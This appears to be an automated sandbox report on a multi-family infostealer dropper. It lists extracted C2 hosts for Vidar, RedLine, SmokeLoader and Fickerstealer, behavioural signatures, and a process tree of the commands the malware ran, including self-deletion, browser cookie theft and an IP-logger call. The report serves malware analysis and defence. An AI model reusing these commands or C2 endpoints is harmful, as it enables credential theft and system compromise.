Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-07-2021 09:44

General

  • Target

    8 (24).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 13 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 8 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 19 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 19 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 55 IoCs
  • Drops file in Program Files directory 32 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 34 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 11 IoCs
  • Kills process with taskkill 11 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1196
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2472
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2868
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
          • Modifies registry class
          PID:2800
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2780
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2528
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1936
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1460
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1144
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1028
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5432
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:9932
                    • C:\Users\Admin\AppData\Roaming\weaetgv
                      C:\Users\Admin\AppData\Roaming\weaetgv
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3976
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1016
                    • C:\Users\Admin\AppData\Local\Temp\8 (24).exe
                      "C:\Users\Admin\AppData\Local\Temp\8 (24).exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:348
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2712
                        • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3768
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1356
                            • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_3.exe
                              sonia_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              • Modifies system certificate store
                              PID:860
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                6⤵
                                  PID:7048
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im sonia_3.exe /f
                                    7⤵
                                    • Kills process with taskkill
                                    PID:2240
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:8116
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4012
                              • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_2.exe
                                sonia_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:1360
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sonia_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1304
                              • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_4.exe
                                sonia_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3532
                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4296
                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4592
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:348
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5848
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:9204
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:10188
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4668
                                        • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4504
                                      • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                        7⤵
                                          PID:4744
                                          • C:\Windows\winnetdriv.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626775097 0
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5096
                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4828
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 816
                                            8⤵
                                            • Program crash
                                            PID:748
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 844
                                            8⤵
                                            • Program crash
                                            PID:5048
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 888
                                            8⤵
                                            • Program crash
                                            PID:4664
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 964
                                            8⤵
                                            • Program crash
                                            PID:4440
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 948
                                            8⤵
                                            • Program crash
                                            PID:5348
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 960
                                            8⤵
                                            • Program crash
                                            PID:5572
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1056
                                            8⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:5396
                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5072
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3572
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4232
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 4232 -s 1012
                                            8⤵
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2084
                                    • C:\Users\Admin\AppData\Local\Temp\7zS89A36714\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3792
                                      • C:\Users\Admin\Documents\F8CXXUAHN9xz_kdL4i35O1ew.exe
                                        "C:\Users\Admin\Documents\F8CXXUAHN9xz_kdL4i35O1ew.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:4800
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                          7⤵
                                            PID:4792
                                            • C:\Windows\SysWOW64\explorer.exe
                                              explorer https://iplogger.org/2LBCU6
                                              8⤵
                                                PID:4196
                                              • C:\Windows\SysWOW64\regedit.exe
                                                regedit /s adj.reg
                                                8⤵
                                                • Runs .reg file with regedit
                                                PID:5412
                                              • C:\Windows\SysWOW64\regedit.exe
                                                regedit /s adj2.reg
                                                8⤵
                                                • Runs .reg file with regedit
                                                PID:7156
                                            • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                              "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4548
                                          • C:\Users\Admin\Documents\LM8V1oCQZoxmcanziYtw2jb9.exe
                                            "C:\Users\Admin\Documents\LM8V1oCQZoxmcanziYtw2jb9.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4572
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                              7⤵
                                                PID:5084
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd
                                                  8⤵
                                                    PID:3320
                                                    • C:\Windows\SysWOW64\findstr.exe
                                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                      9⤵
                                                        PID:5324
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                        Acre.exe.com k
                                                        9⤵
                                                          PID:5892
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                            10⤵
                                                              PID:4980
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                11⤵
                                                                  PID:4380
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                    12⤵
                                                                    • Drops startup file
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:7280
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                      13⤵
                                                                        PID:5388
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 30
                                                                9⤵
                                                                • Runs ping.exe
                                                                PID:7060
                                                        • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                          "C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4424
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4968
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5040
                                                          • C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            C:\Users\Admin\Documents\Q00MIIqbNbJzJgphPYZ5gpA0.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4148
                                                        • C:\Users\Admin\Documents\XrKHnmBKrRZg5o17G5WczH22.exe
                                                          "C:\Users\Admin\Documents\XrKHnmBKrRZg5o17G5WczH22.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4304
                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                            7⤵
                                                              PID:7944
                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                "{path}"
                                                                8⤵
                                                                  PID:6240
                                                            • C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
                                                              "C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4796
                                                              • C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
                                                                C:\Users\Admin\Documents\LCih85lMMzCkhQ35qSWcFJgp.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4804
                                                            • C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
                                                              "C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4300
                                                              • C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
                                                                C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:1592
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im g1XJKeVkAdcSnI6azKnuwKvO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\g1XJKeVkAdcSnI6azKnuwKvO.exe" & del C:\ProgramData\*.dll & exit
                                                                  8⤵
                                                                    PID:7012
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im g1XJKeVkAdcSnI6azKnuwKvO.exe /f
                                                                      9⤵
                                                                      • Kills process with taskkill
                                                                      PID:5680
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      9⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:5836
                                                              • C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe
                                                                "C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4716
                                                                • C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe
                                                                  "C:\Users\Admin\Documents\Ki6HIronTXRHvwm_DxUaSOrm.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Checks processor information in registry
                                                                  PID:2808
                                                              • C:\Users\Admin\Documents\a3XA93S1fy3gZPH1Axw2zMAf.exe
                                                                "C:\Users\Admin\Documents\a3XA93S1fy3gZPH1Axw2zMAf.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:2312
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 660
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4484
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 644
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5448
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 640
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5660
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 692
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5792
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1080
                                                                  7⤵
                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                  • Program crash
                                                                  PID:5588
                                                              • C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
                                                                "C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5092
                                                                • C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
                                                                  C:\Users\Admin\Documents\JTLJdq6SxsyUQBGX0Lf8FPTg.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:2224
                                                              • C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
                                                                "C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Drops file in Windows directory
                                                                PID:4744
                                                                • C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
                                                                  C:\Users\Admin\Documents\bRcgkNRZ2XdbvfFVM514zgma.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:4936
                                                              • C:\Users\Admin\Documents\ygSAhzIDffAddZbpOSiCsBe6.exe
                                                                "C:\Users\Admin\Documents\ygSAhzIDffAddZbpOSiCsBe6.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4896
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:6832
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:6876
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:3080
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:7968
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:6704
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:10340
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:7036
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:8856
                                                                              • C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe
                                                                                "C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4552
                                                                                • C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe
                                                                                  "C:\Users\Admin\Documents\RKup2eyRifoJjIKidGatOWcc.exe"
                                                                                  7⤵
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:9584
                                                                              • C:\Users\Admin\Documents\wcyzwGXHOD5HyQft5VHxUKjI.exe
                                                                                "C:\Users\Admin\Documents\wcyzwGXHOD5HyQft5VHxUKjI.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Checks whether UAC is enabled
                                                                                PID:2196
                                                                              • C:\Users\Admin\Documents\mYn9NSlCch3gtzWvrhEchSzp.exe
                                                                                "C:\Users\Admin\Documents\mYn9NSlCch3gtzWvrhEchSzp.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:2200
                                                                              • C:\Users\Admin\Documents\VhOjovJTYThP3vzVI4Ya88j_.exe
                                                                                "C:\Users\Admin\Documents\VhOjovJTYThP3vzVI4Ya88j_.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4704
                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4632
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS812170B5\setup_install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS812170B5\setup_install.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
